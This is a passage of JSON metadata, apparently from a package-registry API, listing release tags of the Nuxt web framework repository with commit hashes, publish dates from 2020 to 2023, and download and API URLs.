:"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.2/manifests"},{"name":"v3.2.3","sha":"021ba4310e47301996967c2a9b581152095cb995","kind":"commit","published_at":"2023-02-28T11:19:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.3/manifests"},{"name":"v3.2.2","sha":"3a832bacb8f747bc3df656ddb926defe607b07f3","kind":"commit","published_at":"2023-02-17T16:39:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.2/manifests"},{"name":"v3.2.1","sha":"5c47d4c5ab0add324a412c9d64700acf41b41f5b","kind":"commit","published_at":"2023-02-17T15:56:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.1/manifests"},{"name":"v2.16.1","sha":"41148648ee597424c94a31ce0f36bb742c5ec695","kind":"commit","published_at":"2023-02-13T12:08:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.1/manifests"},{"name":"v3.2.0","sha":"5855c1ed53ae1336fcfeb118a27c7201a9b83949","kind":"commit","published_at":"2023-02-09T10:55:03.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.0/manifests"},{"name":"v3.1.2","sha":"225988ebd56aedf831b37bfce293ba76814ddb59","kind":"commit","published_at":"2023-02-03T12:56:51.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.2/manifests"},{"name":"v2.16.0","sha":"6dc6cef9abd17346498d41572dd47a4fd99c900d","kind":"tag","published_at":"2023-02-03T12:48:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.0/manifests"},{"name":"3.1.1","sha":"deb0837c1655b7446befcc8c7df4dedeb3154974","kind":"commit","published_at":"2023-01-25T22:04:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/3.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/3.1.1/manifests"},{"name":"v3.1.1","sha":"deb0837c1655b7446befcc8c7df4dedeb3154974","kind":"commit","published_at":"2023-01-25T22:04:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.1/manifests"},{"name":"v3.1.0","sha":"c552d1b420caaac0184fd5c332ebc55b0b0d77ad","kind":"commit","published_at":"2023-01-24T16:47:20.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"d991a55ec36f5ac61de0af7d0b018a150153445b","kind":"commit","published_at":"2022-11-16T14:56:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0/manifests"},{"name":"v3.0.0-rc.14","sha":"0faeb3b5a33203d543de32bf1b9a40b394b979ab","kind":"commit","published_at":"2022-11-16T02:38:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.14","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.14","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.14/manifests"},{"name":"v3.0.0-rc.13","sha":"bde96947333501c22a5e981515bd27c24eb8b88f","kind":"commit","published_at":"2022-11-04T11:37:49.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.13","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.13","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.13/manifests"},{"name":"v3.0.0-rc.12","sha":"09e553467e970a3bbd092698640c96ddf86d596b","kind":"commit","published_at":"2022-10-18T18:47:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.12","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.12","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.12/manifests"},{"name":"v3.0.0-rc.11","sha":"6309d223bb247764e32e90d196aca5fd4b913805","kind":"commit","published_at":"2022-09-20T16:38:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.11","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.11/manifests"},{"name":"v3.0.0-rc.10","sha":"94377b190180922c8156f6753512362392b3552d","kind":"commit","published_at":"2022-09-14T16:27:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.10","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.10/manifests"},{"name":"v3.0.0-rc.9","sha":"9caa9ca31fca90a775d316bfc68ac98952d82942","kind":"commit","published_at":"2022-09-03T10:36:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.9/manifests"},{"name":"v3.0.0-rc.8","sha":"3960f513c377e1ef5d47986a13c1c66c1eaa1afc","kind":"commit","published_at":"2022-08-12T13:35:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.8/manifests"},{"name":"v3.0.0-rc.7","sha":"5ea0474225c3591cd743f51a72aa2cd7597ec0e4","kind":"commit","published_at":"2022-08-11T10:40:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.7/manifests"},{"name":"v3.0.0-rc.6","sha":"88f4525a4fa7dc1595e85b0cfffdd441aa6970ed","kind":"commit","published_at":"2022-07-18T10:06:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.6/manifests"},{"name":"v3.0.0-rc.5","sha":"65e6b1439e14a196d8b15db51939c65d934532e7","kind":"commit","published_at":"2022-07-13T15:40:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.5/manifests"},{"name":"v3.0.0-rc.4","sha":"be0e502a05a9c8bb2eeaa62459d611f6363be89f","kind":"commit","published_at":"2022-06-13T14:27:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.4/manifests"},{"name":"v3.0.0-rc.3","sha":"36512d0eaaa32e0dd1d0887098fcf842a7fa66b1","kind":"commit","published_at":"2022-05-10T08:58:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.3/manifests"},{"name":"v3.0.0-rc.2","sha":"a8d42d586f84b7cef66c7bf8b76eb560139e6f88","kind":"commit","published_at":"2022-05-02T20:47:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.2/manifests"},{"name":"v3.0.0-rc.1","sha":"0c2f07695702df33a63b88322d93d6815a227a0f","kind":"commit","published_at":"2022-04-20T21:09:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.1/manifests"},{"name":"v2.15.8","sha":"d4b9e4b0553bcd617ecbc0b8b76871070b347fcb","kind":"tag","published_at":"2021-08-11T21:10:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.8/manifests"},{"name":"v2.15.7","sha":"4f370e2043b7731db0e8ef65a4f88431cd8795f3","kind":"tag","published_at":"2021-06-14T13:59:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.7/manifests"},{"name":"v2.15.6","sha":"0eae970e74f1fbf29f400a3178f54061a79bfac2","kind":"tag","published_at":"2021-05-12T10:47:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.6/manifests"},{"name":"v2.15.5","sha":"0460a278ab5258f0cd6d3fe8fc014f892b2bdaf6","kind":"tag","published_at":"2021-05-09T08:17:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.5/manifests"},{"name":"v2.15.4","sha":"b39dcda6adf21e4eb82caef7895440755c6d96fc","kind":"tag","published_at":"2021-04-01T11:23:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.4/manifests"},{"name":"v2.15.3","sha":"24a0c7e27123874f9545c46852b2e7d34920b017","kind":"tag","published_at":"2021-03-10T12:25:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.3/manifests"},{"name":"v2.15.2","sha":"b7f9cdc2a44dbf25b1bd1845fdc8ebb65b0f0754","kind":"tag","published_at":"2021-02-23T09:20:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.2/manifests"},{"name":"v2.15.1","sha":"95daddf43c3b9e9474870631727755ecd2e94319","kind":"tag","published_at":"2021-02-19T16:39:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.1/manifests"},{"name":"v2.15.0","sha":"dcfb42b77221f559e7ccb09edd5c2a2004c5bc6b","kind":"tag","published_at":"2021-02-15T11:06:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.0/manifests"},{"name":"v2.14.12","sha":"bde4c5f6b0e643716d97027cdd185891ada02f7f","kind":"tag","published_at":"2020-12-16T13:15:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.12","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.12","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.12/manifests"},{"name":"v2.14.11","sha":"d85f4b92642f4668463deb286524d424e57a1f62","kind":"tag","published_at":"2020-12-09T23:21:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.11","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.11/manifests"},{"name":"v2.14.10","sha":"e97051adfafb9517cabbfd9b87a02e8c37ce949e","kind":"tag","published_at":"2020-12-07T10:30:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.10","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.10/manifests"},{"name":"v2.14.9","sha":"e9f380c9e6b729ab77b38babba6ad15e95b4efa8","kind":"tag","published_at":"2020-12-02T10:35:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.9/manifests"},{"name":"v2.14.8","sha":"68d8fb84872b807b2149756bb97a84961854a2c3","kind":"tag","published_at":"2020-12-01T11:06:52.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.8/manifests"},{"name":"v2.14.7","sha":"265d0e7aac3df9f83f323c4d2dba11434956fe9b","kind":"tag","published_at":"2020-10-15T16:29:55.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.7/manifests"},{"name":"v2.14.6","sha":"41176577ad71a8b91a91ca8f458fd64a278dd88d","kind":"tag","published_at":"2020-09-21T10:46:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.6/manifests"},{"name":"v2.14.5","sha":"3b037720f2edc3e351d200bbb8525df1e93d7aad","kind":"tag","published_at":"2020-09-10T12:36:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.5/manifests"},{"name":"v2.14.4","sha":"1a77fba4eb247faa3f1c8ec0fa49ce372abeb1d8","kind":"tag","published_at":"2020-08-27T10:26:49.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.4/manifests"},{"name":"v2.14.3","sha":"5e9d759d7bee6a3d32e16ef05eef988e882c600a","kind":"tag","published_at":"2020-08-16T17:04:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.3/manifests"},{"name":"v2.14.2","sha":"34c56722c8c97c0c6a59ecfbc5836c38047e4572","kind":"tag","published_at":"2020-08-16T10:59:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.2/manifests"},{"name":"v2.14.1","sha":"c30499d7e02cd6d8b51d97ee7d7a537d8a59f63b","kind":"tag","published_at":"2020-08-04T16:37:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.1/manifests"},{"name":"v2.14.0","sha":"60f68638cb80ab461c5b02be34e8797677bd8dd1","kind":"tag","published_at":"2020-07-27T17:25:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.0/manifests"},{"name":"v2.13.3","sha":"e3821ba78c23fafa753941a0c206bd23e39dd678","kind":"tag","published_at":"2020-07-02T18:08:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.3/manifests"},{"name":"v2.13.2","sha":"c998072c94eef659d45819eaa2b18897b8923538","kind":"tag","published_at":"2020-06-26T19:03:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_u